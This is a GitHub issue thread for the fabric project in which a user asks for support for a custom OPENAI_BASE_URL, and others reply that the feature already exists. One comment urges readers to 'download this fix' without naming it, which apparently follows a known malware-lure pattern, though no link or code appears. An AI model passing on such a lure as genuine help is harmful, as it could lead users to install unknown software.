-
Notifications
You must be signed in to change notification settings - Fork 3k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[Feature request]: Add support for setting a custom OPENAI_BASE_URL #883
Comments
to fix your trouble try download this fix, i see it in another issue, |
that will be nice for llama.cpp's server or llamafiles. A lot of models and a big community. Tanks for the project. |
A configurable OPENAI_BASE_URL may be a strong demand for users in some areas. |
This feature is already in place.
|
It is already available for several releases. |
What do you need?
In the previous python version of fabric, i was able to use the free Llama 3.1 api at https://chatapi.akash.network/ by setting the 'OPENAI_BASE_URL' environment variable. This seems to no longer be possible in the Go version.
Please re-integrate this feature so we can use Llama 3.1 400b with fabric. :^)
The text was updated successfully, but these errors were encountered: